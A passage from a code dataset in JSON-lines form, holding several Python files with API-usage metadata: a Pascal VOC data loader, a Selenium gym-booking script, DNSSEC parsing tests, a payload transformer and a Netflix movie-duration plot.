"nextcord.ext.commands.BucketType", "line_number": 264, "usage_type": "attribute"}, {"api_name": "nextcord.User", "line_number": 283, "usage_type": "name"}, {"api_name": "re.search", "line_number": 284, "usage_type": "call"}, {"api_name": "nextcord.ext.commands.group", "line_number": 278, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 278, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.check", "line_number": 279, "usage_type": "call"}, {"api_name": "utils.customCogChecks.is_public", "line_number": 279, "usage_type": "argument"}, {"api_name": "nextcord.ext.commands", "line_number": 279, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.check", "line_number": 280, "usage_type": "call"}, {"api_name": "utils.customCogChecks.has_wallet", "line_number": 280, "usage_type": "argument"}, {"api_name": "nextcord.ext.commands", "line_number": 280, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.guild_only", "line_number": 281, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 281, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.cooldown", "line_number": 282, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 282, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.BucketType", "line_number": 282, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands.CheckFailure", "line_number": 298, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 298, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.BadArgument", "line_number": 305, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 305, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.CommandOnCooldown", "line_number": 315, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 315, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.MissingRequiredArgument", "line_number": 321, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 321, "usage_type": "name"}]}
+{"seq_id": "705030755", "text": "import os\nimport math\nimport torch\nimport collections\nimport numpy as np\nfrom PIL import Image\nfrom bs4 import BeautifulSoup\n\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass VOCDataset(Dataset):\n def __init__(self, VOC2012_dir):\n\n self.idx2class = [\n \"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\",\n \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\",\n \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n\n self.class2idx = {\n \"background\": 0, \"aeroplane\": 1, \"bicycle\": 2, \"bird\": 3, \"boat\": 4, \"bottle\": 5,\n \"bus\": 6, \"car\": 7, \"cat\": 8, \"chair\": 9, \"cow\": 10, \"diningtable\": 11, \"dog\": 12,\n \"horse\": 13, \"motorbike\": 14, \"person\": 15, \"pottedplant\": 16, \"sheep\": 17,\n \"sofa\": 18, \"train\": 19, \"tvmonitor\": 20}\n\n image_dir = os.path.join(VOC2012_dir, \"JPEGImages\")\n file_names = os.listdir(image_dir)\n self.images = [os.path.join(image_dir, x) for x in file_names]\n\n target_dir = os.path.join(VOC2012_dir, \"Annotations\")\n file_names = os.listdir(target_dir)\n self.annotations = [os.path.join(target_dir, x) for x in file_names]\n\n assert len(self.images) == len(self.annotations)\n\n def __getitem__(self, index):\n assert index < self.__len__()\n\n image = Image.open(self.images[index]).convert(\"RGB\")\n # Image shape: H W C\n image = np.asarray(image)\n # to [0,1]\n image = image / 255.0\n # permute axes: C H W\n image = np.transpose(image, (2, 0, 1))\n # To tensor\n image = torch.from_numpy(image)\n image = image.type(torch.FloatTensor)\n \n target = self.parse_voc_xml(self.annotations[index])\n\n return image, target\n\n def __len__(self):\n return len(self.images)\n\n def parse_voc_xml(self, xml_path):\n soup = BeautifulSoup(open(xml_path), features=\"html.parser\").annotation\n o = soup.find_all(\"object\")\n labels = []\n bboxes = []\n for obj in o:\n obj_class = obj.find(\"name\").string\n obj_class_idx = self.class2idx[obj_class]\n xmin = int(float(obj.find(\"xmin\").string))\n xmax = int(float(obj.find(\"xmax\").string))\n ymin = int(float(obj.find(\"ymin\").string))\n ymax = int(float(obj.find(\"ymax\").string))\n labels.append(obj_class_idx)\n bboxes.append([xmin, ymin, xmax, ymax])\n targets = {\n \"boxes\": torch.tensor(bboxes),\n \"labels\": torch.tensor(labels),\n }\n return targets\n\n\nclass VOCLoader:\n def __init__(self, dataset, batch_size, shuffle, val_proportion=None):\n self.dataset = dataset\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.dataset_len = len(dataset)\n self.train_total_iters = math.ceil(self.dataset_len / batch_size)\n self.train_current = 0\n self.val_current = 0\n self.training = True\n self.val_proportion = val_proportion\n self.set_index()\n print(\"train total iters:\" + str(self.train_total_iters))\n print(\"train total iters:\" + str(self.val_total_iters))\n\n def set_index(self):\n self.train_current = 0\n self.val_current = 0\n idx_pool = np.arange(self.dataset_len)\n if self.shuffle:\n np.random.shuffle(idx_pool)\n self.train_idx = idx_pool\n self.val_idx = None\n self.num_train = num_train = self.dataset_len\n self.num_val = 0\n if self.val_proportion is not None:\n num_val = int(self.val_proportion * self.dataset_len)\n num_train = self.dataset_len - num_val\n self.num_train = num_train\n self.num_val = num_val\n self.train_idx = idx_pool[:num_train]\n self.val_idx = idx_pool[num_train:]\n self.train_total_iters = math.ceil(num_train / self.batch_size)\n self.val_total_iters = math.ceil(num_val / self.batch_size)\n \n def __iter__(self):\n return self\n\n def __next__(self):\n if self.training:\n if self.train_current < self.train_total_iters:\n sidx = self.train_current * self.batch_size\n self.train_current += 1\n if self.train_current == self.train_total_iters:\n sampled_idx = self.train_idx[sidx:]\n else:\n sampled_idx = self.train_idx[sidx: sidx + self.batch_size]\n images = []\n targets = []\n for idx in sampled_idx:\n image, target = self.dataset[idx]\n images.append(image)\n targets.append(target)\n return images, targets\n else:\n raise StopIteration\n else:\n if self.val_current < self.val_total_iters:\n sidx = self.val_current * self.batch_size\n self.val_current += 1\n if self.val_current == self.val_total_iters:\n sampled_idx = self.val_idx[sidx:]\n else:\n sampled_idx = self.val_idx[sidx: sidx + self.batch_size]\n images = []\n targets = []\n for idx in sampled_idx:\n image, target = self.dataset[idx]\n images.append(image)\n targets.append(target)\n return images, targets\n else:\n raise StopIteration\n\n def train(self):\n self.set_index()\n self.training = True\n\n def val(self):\n self.set_index()\n self.training = False\n\n\nif __name__ == \"__main__\":\n pass", "repo_name": "vlgdglv/faster-rcnn-simple", "sub_path": "VOCDataset.py", "file_name": "VOCDataset.py", "file_ext": "py", "file_size_in_byte": 5773, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 48, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 73, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 98, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 110, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 111, "usage_type": "call"}]}
+{"seq_id": "24723755705", "text": "from datetime import date\nimport datetime\nimport time\nimport calendar\nimport os\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException\n\nurl = \"https://campusrecshop.usf.edu/booking\"\n\nusername = '#your net Id'\nemail = '#your email'\npassword = '#your password'\n\n\n#Troubleshooter\ndef highlight(element, effect_time, color, border):\n #Highlights (blinks) a Selenium Webdriver element\n driver = element._parent\n def apply_style(s):\n driver.execute_script(\"arguments[0].setAttribute('style', arguments[1]);\",\n element, s)\n original_style = element.get_attribute('style')\n apply_style(\"border: {0}px solid {1};\".format(border, color))\n time.sleep(effect_time)\n apply_style(original_style)\n\ndef dateTester():\n #See what day output word\n dateAll = date.today()\n dayPLZ = calendar.day_name[dateAll.weekday()]\n\n '''\n #See what day of week output number 0-6 0 = Moday \n dayPLZ = datetime.datetime.today().weekday()\n '''\n\n #print(dateAll)\n print(dayPLZ)\n\n if dayPLZ == 'Saturday' or dayPLZ == 'Wednesday':\n gDay = True\n else: \n gDay = False\n\n print(gDay)\n return gDay\n\ndef check_exists_by_id(id):\n try:\n browser.find_element_by_id(id)\n except NoSuchElementException:\n return False\n return True\n\n\n'''\ndef reservationBtns():\n browser = webdriver.Chrome(ChromeDriverManager().install())\n\n allBtns = browser.find_elements_by_xpath(\"//div[@class='btn btn-primary']\")\n\n for btn in allBtns:\n print(btn)\n\n return allBtns\n'''\n\nif __name__ == \"__main__\":\n\n gDay = dateTester()\n\n if gDay == True:\n browser = webdriver.Chrome(ChromeDriverManager().install())\n btnDiv = 'flex-center margin-top-24'\n\n browser.get(url)\n browser.maximize_window()\n\n browser.find_element_by_id('loginLink').click()\n\n time.sleep(1)\n \n browser.find_element_by_class_name(\"loginOption\").click()\n \n time.sleep(5)\n \n if browser.find_element_by_id(\"i0116\"):\n \n browser.find_element_by_id(\"i0116\").send_keys(email)\n browser.find_element_by_id(\"idSIButton9\").click()\n\n time.sleep(5)\n browser.find_element_by_id(\"i0118\").send_keys(password)\n browser.find_element_by_id(\"idSIButton9\").click()\n\n time.sleep(5)\n browser.find_element_by_id(\"idSIButton9\").click()\n\n elif browser.find_element_by_id(\"username\"):\n #Log in sequence\n browser.find_element_by_id(\"username\").send_keys(username)\n browser.find_element_by_id(\"password\").send_keys(password)\n browser.find_element_by_id(\"btn-submit\").click()\n \n\n #Click Rec link\n browser.find_element_by_class_name(\"container-image-link-item\").click()\n\n time.sleep(1)\n \n browser.find_element_by_css_selector(\".btn.btn-default.single-date-select-button.single-date-select-one-click\").click()\n\n time.sleep(1)\n\n tester = browser.find_element_by_css_selector(\".booking-slot-item-right.booking-slot-action-item\")\n\n #highlight(tester, 5, \"yellow\", 15)\n\n #tester.click()\n '''\n #Highlights the Div containing the button\n btnDiv = browser.find_element_by_xpath(\"//div[@class='booking-slot-item'][@data-slot-number='2']\")\n highlight(btnDiv, 2, \"blue\", 15)\n '''\n\n '''\n #Finds all Book Now buttons on the page\n btn = browser.find_elements_by_xpath(\"//button[@class='btn btn-primary']\")\n for btns in btn:\n print(btns)\n highlight(btns, 5, \"yellow\", 15)\n '''\n \n browser.find_elements_by_xpath(\"//button[@class='btn btn-primary']\")[1].click()\n\n #browser.close()\n\n else:\n print(\"No Gym Class tommorrow\")\n", "repo_name": "XzavierMcK/Python", "sub_path": "Auto Reserve Gym/GymReservation.py", "file_name": "GymReservation.py", "file_ext": "py", "file_size_in_byte": 3936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 31, "usage_type": "name"}, {"api_name": "calendar.day_name", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 75, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 75, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 75, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 87, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 111, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 115, "usage_type": "call"}]}
+{"seq_id": "30635746244", "text": "import datetime\nfrom unittest import TestCase\n\nfrom kskm.common.data import AlgorithmDNSSEC, Key, Signature, Signer, TypeDNSSEC\nfrom kskm.common.parse_utils import (\n duration_to_timedelta,\n keys_from_dict,\n signature_from_dict,\n)\nfrom kskm.ksr.parse_utils import signers_from_list\n\n\nclass Test_duration_to_timedelta(TestCase):\n def test_duration_to_timedelta_empty(self):\n \"\"\" Test empty input \"\"\"\n td = duration_to_timedelta(\"\")\n self.assertEqual(td.total_seconds(), 0)\n\n def test_duration_to_timedelta_basic(self):\n \"\"\" Test the most basic case \"\"\"\n td = duration_to_timedelta(\"P1D\")\n self.assertEqual(td.total_seconds(), 86400)\n\n def test_duration_to_timedelta_day_hour(self):\n \"\"\" Test hour \"\"\"\n td = duration_to_timedelta(\"P1H\")\n self.assertEqual(td.total_seconds(), 3600)\n\n def test_duration_to_timedelta_day_minute(self):\n \"\"\" Test both day and minute \"\"\"\n td = duration_to_timedelta(\"P1DT1M\")\n self.assertEqual(td.total_seconds(), 86460)\n\n def test_duration_to_timedelta_day_second(self):\n \"\"\" Test day and second \"\"\"\n td = duration_to_timedelta(\"P1D1\")\n self.assertEqual(td.total_seconds(), 86401)\n\n def test_duration_to_timedelta_second(self):\n \"\"\" Test second \"\"\"\n td = duration_to_timedelta(\"P11S\")\n self.assertEqual(td.total_seconds(), 11)\n\n def test_duration_to_timedelta_week(self):\n \"\"\" Test second \"\"\"\n td = duration_to_timedelta(\"P1W\")\n self.assertEqual(td.total_seconds(), 86400 * 7)\n\n def test_bogus(self):\n \"\"\" Test totally bogus duration \"\"\"\n with self.assertRaises(ValueError):\n duration_to_timedelta(\"foo\")\n\n def test_invalid(self):\n \"\"\" Test invalid duration \"\"\"\n with self.assertRaises(ValueError):\n duration_to_timedelta(\"Pfoo\")\n\n\nclass Test_signers_from_list(TestCase):\n def test_basic(self):\n \"\"\" Test basic KSR Signer parsing \"\"\"\n data = [\n {\"attrs\": {\"keyIdentifier\": \"KC00020\"}, \"value\": \"\"},\n {\"attrs\": {\"keyIdentifier\": \"KC00094\"}, \"value\": \"\"},\n ]\n out = signers_from_list(data)\n self.assertEqual(\n out, {Signer(key_identifier=\"KC00020\"), Signer(key_identifier=\"KC00094\")}\n )\n\n def test_no_signer(self):\n \"\"\" Test that KSR Signer is optional \"\"\"\n self.assertIsNone(signers_from_list([]))\n\n\nclass Test_keys_from_list(TestCase):\n def test_basic(self):\n \"\"\" Test basic KSR Key parsing \"\"\"\n data = [\n {\n \"attrs\": {\"keyIdentifier\": \"ZSK-24315\", \"keyTag\": \"24315\"},\n \"value\": {\n \"Algorithm\": \"5\",\n \"Flags\": \"256\",\n \"Protocol\": \"3\",\n \"PublicKey\": \"A...\",\n \"TTL\": 1978,\n },\n }\n ]\n out = keys_from_dict(data)\n expected = {\n Key(\n key_identifier=\"ZSK-24315\",\n key_tag=24315,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=b\"A...\",\n )\n }\n self.assertEqual(out, expected)\n\n def test_with_ttl(self):\n \"\"\" Test Key with TTL \"\"\"\n data = [\n {\n \"attrs\": {\"keyIdentifier\": \"ZSK-24315\", \"keyTag\": \"24315\"},\n \"value\": {\n \"Algorithm\": \"5\",\n \"Flags\": \"256\",\n \"Protocol\": \"3\",\n \"PublicKey\": \"A...\",\n \"TTL\": \"1978\",\n },\n }\n ]\n out = keys_from_dict(data)\n expected = {\n Key(\n key_identifier=\"ZSK-24315\",\n key_tag=24315,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=b\"A...\",\n )\n }\n self.assertEqual(out, expected)\n\n def test_ecdsa_key(self):\n \"\"\" Test loading an ECDSA key \"\"\"\n public_key = r\"BGuqYyOGr0p/uKXm0MmP4Cuiml/a8FCPRDLerVyBS4jHmJlKTJmYk/nCbOp936DSh5SMu6+2WYJUI6K5AYfXbTE=\"\n data = [\n {\n \"attrs\": {\"keyIdentifier\": \"EC1\", \"keyTag\": \"0\"},\n \"value\": {\n \"Algorithm\": AlgorithmDNSSEC.ECDSAP256SHA256.value,\n \"Flags\": \"256\",\n \"Protocol\": \"3\",\n \"PublicKey\": public_key,\n \"TTL\": \"1978\",\n },\n }\n ]\n out = keys_from_dict(data)\n expected = {\n Key(\n key_identifier=\"EC1\",\n key_tag=0,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.ECDSAP256SHA256,\n public_key=public_key.encode(),\n )\n }\n self.assertEqual(out, expected)\n\n # now change the algorithm and verify that the discrepancy between curve point size and algorithm is detected\n data[0][\"value\"][\"Algorithm\"] = AlgorithmDNSSEC.ECDSAP384SHA384.value\n with self.assertRaises(ValueError) as exc:\n keys_from_dict(data)\n self.assertEqual(\n \"Unexpected ECDSA key length 256 for algorithm AlgorithmDNSSEC.ECDSAP384SHA384\",\n str(exc.exception),\n )\n\n\nclass Test_signature_from_dict(TestCase):\n def test_basic(self):\n \"\"\" Test basic KSR Signature parsing \"\"\"\n sig = {\n \"attrs\": {\"keyIdentifier\": \"ZSK-24315\"},\n \"value\": {\n \"Algorithm\": \"5\",\n \"KeyTag\": \"24315\",\n \"Labels\": \"0\",\n \"OriginalTTL\": \"3600\",\n \"SignatureData\": \"SIG...\",\n \"SignatureExpiration\": \"2009-09-24T18:22:41Z\",\n \"SignatureInception\": \"2009-08-25T18:22:41Z\",\n \"SignersName\": \".\",\n \"TypeCovered\": \"DNSKEY\",\n \"TTL\": 1234,\n },\n }\n out = signature_from_dict(sig)\n utc = datetime.timezone.utc\n expected = {\n Signature(\n key_identifier=\"ZSK-24315\",\n ttl=1234,\n type_covered=TypeDNSSEC.DNSKEY,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n labels=0,\n original_ttl=3600,\n signature_expiration=datetime.datetime(\n 2009, 9, 24, 18, 22, 41, tzinfo=utc\n ),\n signature_inception=datetime.datetime(\n 2009, 8, 25, 18, 22, 41, tzinfo=utc\n ),\n key_tag=24315,\n signers_name=\".\",\n signature_data=b\"SIG...\",\n )\n }\n self.assertEqual(out, expected)\n", "repo_name": "iana-org/dnssec-keytools", "sub_path": "src/kskm/ksr/tests/test_parse_utils.py", "file_name": "test_parse_utils.py", "file_ext": "py", "file_size_in_byte": 6950, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 16, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 21, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 26, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 31, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 41, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 46, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 52, "usage_type": "call"}, {"api_name": "kskm.common.parse_utils.duration_to_timedelta", "line_number": 57, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 60, "usage_type": "name"}, {"api_name": "kskm.ksr.parse_utils.signers_from_list", "line_number": 67, "usage_type": "call"}, {"api_name": "kskm.common.data.Signer", "line_number": 69, "usage_type": "call"}, {"api_name": "kskm.ksr.parse_utils.signers_from_list", "line_number": 74, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 77, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.keys_from_dict", "line_number": 92, "usage_type": "call"}, {"api_name": "kskm.common.data.Key", "line_number": 94, "usage_type": "call"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.RSASHA1", "line_number": 100, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 100, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.keys_from_dict", "line_number": 120, "usage_type": "call"}, {"api_name": "kskm.common.data.Key", "line_number": 122, "usage_type": "call"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.RSASHA1", "line_number": 128, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 128, "usage_type": "name"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.ECDSAP256SHA256", "line_number": 141, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 141, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.keys_from_dict", "line_number": 149, "usage_type": "call"}, {"api_name": "kskm.common.data.Key", "line_number": 151, "usage_type": "call"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.ECDSAP256SHA256", "line_number": 157, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 157, "usage_type": "name"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.ECDSAP384SHA384", "line_number": 164, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 164, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.keys_from_dict", "line_number": 166, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 173, "usage_type": "name"}, {"api_name": "kskm.common.parse_utils.signature_from_dict", "line_number": 191, "usage_type": "call"}, {"api_name": "datetime.timezone", "line_number": 192, "usage_type": "attribute"}, {"api_name": "kskm.common.data.Signature", "line_number": 194, "usage_type": "call"}, {"api_name": "kskm.common.data.TypeDNSSEC.DNSKEY", "line_number": 197, "usage_type": "attribute"}, {"api_name": "kskm.common.data.TypeDNSSEC", "line_number": 197, "usage_type": "name"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC.RSASHA1", "line_number": 198, "usage_type": "attribute"}, {"api_name": "kskm.common.data.AlgorithmDNSSEC", "line_number": 198, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 201, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 204, "usage_type": "call"}]}
+{"seq_id": "3916689097", "text": "import json\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Callable, List, Union\nfrom urllib.parse import parse_qsl, urlencode\n\nfrom jsonpath_ng import parse\n\nfrom lxml import etree\n\n\nclass TransformerError(Exception):\n pass\n\n\nclass PayloadTransformer(metaclass=ABCMeta):\n @abstractmethod\n def transform(\n self,\n payload: Union[str, bytes],\n transformer_array: List[str],\n operation: Callable,\n ) -> Union[str, bytes]:\n pass\n\n\nclass JsonTransformer(PayloadTransformer):\n def transform(\n self,\n payload: Union[str, bytes],\n transformer_array: List[str],\n operation: Callable,\n ):\n payload_json = json.loads(payload)\n for expression in transformer_array:\n json_expr = parse(expression)\n for match in json_expr.find(payload_json):\n json_expr.update(payload_json, operation(match.value))\n return json.dumps(payload_json)\n\n\nclass FormDataTransformer(PayloadTransformer):\n def transform(\n self,\n payload: Union[str, bytes],\n transformer_array: List[str],\n operation: Callable,\n ) -> str:\n result = []\n target_fields = set(transformer_array)\n if isinstance(payload, bytes):\n payload = payload.decode()\n\n for name, value in parse_qsl(payload, keep_blank_values=True):\n if value and name in target_fields:\n value = operation(value)\n result.append((name, value))\n\n return urlencode(result)\n\n\nclass XMLTransformer(PayloadTransformer):\n def transform(\n self,\n payload: Union[str, bytes],\n transformer_array: List[str],\n operation: Callable,\n ) -> str:\n try:\n root = etree.fromstring(payload)\n except etree.XMLSyntaxError as exc:\n raise TransformerError(f'Invalid XML payload: {exc}.') from exc\n\n has_matches = False\n for expr in transformer_array:\n try:\n for element in root.xpath(expr):\n has_matches = True\n self._transform(operation, element)\n\n except etree.XPathEvalError as exc:\n raise TransformerError(\n f'Invalid XPath expression {expr}: {exc}.'\n ) from exc\n\n if has_matches:\n return etree.tostring(root, encoding='utf-8').decode('utf-8')\n\n return payload\n\n def _transform(self, operation: Callable, element: etree.ElementBase):\n value = ''.join(element.itertext())\n if not value:\n return\n element.clear()\n element.text = operation(value)\n\n\ntransformer_map = {\n 'FORM_FIELD': FormDataTransformer(),\n 'JSON_PATH': JsonTransformer(),\n 'XPATH': XMLTransformer(),\n}\n", "repo_name": "mnimmny/vgs-satellite", "sub_path": "satellite/vault/transformer.py", "file_name": "transformer.py", "file_ext": "py", "file_size_in_byte": 2808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "abc.ABCMeta", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 21, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 31, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 33, "usage_type": "call"}, {"api_name": "jsonpath_ng.parse", "line_number": 35, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 46, "usage_type": "name"}, {"api_name": "urllib.parse.parse_qsl", "line_number": 53, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 58, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 66, "usage_type": "name"}, {"api_name": "lxml.etree.fromstring", "line_number": 69, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 69, "usage_type": "name"}, {"api_name": "lxml.etree.XMLSyntaxError", "line_number": 70, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 70, "usage_type": "name"}, {"api_name": "lxml.etree.XPathEvalError", "line_number": 80, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 80, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 86, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 86, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 90, "usage_type": "name"}, {"api_name": "lxml.etree.ElementBase", "line_number": 90, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 90, "usage_type": "name"}]}
+{"seq_id": "20844229635", "text": "# import pandas and matplotlib\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# read the csv file to a DataFrame\nnetflix_df = pd.read_csv('netflix/netflix_data.csv')\n# print the first 5 rows to and columns' info to understand the dataframe\nprint(netflix_df[0:5])\nprint(netflix_df.info())\n# filter the dataframe for movies\nnetflix_df_moviesonly = netflix_df[netflix_df['type'] == 'Movie']\n# select columns of interest\nnetflix_movies_col_subset = netflix_df_moviesonly.iloc[:, [1, 2, 5, 10, 7, 8]]\n# for the plot, save x and y axes columns\nyears = netflix_movies_col_subset['release_year']\ndurations = netflix_movies_col_subset['duration']\n# plot the chart\nplt.scatter(years, durations)\n# label the axes\nplt.xlabel('Release Year', fontsize=14)\nplt.ylabel('Duration (min)', fontsize=14)\n# title the plot\nplt.title('Movie Duration by Year of Release', fontsize=20)\nplt.savefig('movie_average.png')\n# filter movie genres of less than 60 min play\nshort_movies = netflix_movies_col_subset[netflix_movies_col_subset['duration'] < 60]\n# print frist few rows of short_movies\nprint(f\"\\n{short_movies.head(30)}\")\n# initialize an empty list of colors\ncolors = []\n# iterate through the dateset\nfor lab, row in netflix_movies_col_subset.iterrows():\n if row['genre'] == 'Children':\n colors.append('red')\n elif row['genre'] == 'Documentaries':\n colors.append('blue')\n elif row['genre'] == 'Stand-Up':\n colors.append('green')\n else:\n colors.append('black')\n# plor the chart again\nplt.scatter(years, durations, c=colors)\n# label the axes\nplt.xlabel('Release year', fontsize=14)\nplt.ylabel('Duration (min)', fontsize=14)\nplt.title('Movie duration by year of release')\nplt.savefig('movie_average(1).png')\n# Is it certain that movies are getting shorter?\nare_movies_getting_shorter = 'maybe'\n", "repo_name": "Vickythedeveloper/datacamp_project1", "sub_path": "netflix/netflix_movies_avgdur.py", "file_name": "netflix_movies_avgdur.py", "file_ext": "py", "file_size_in_byte": 1815, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", 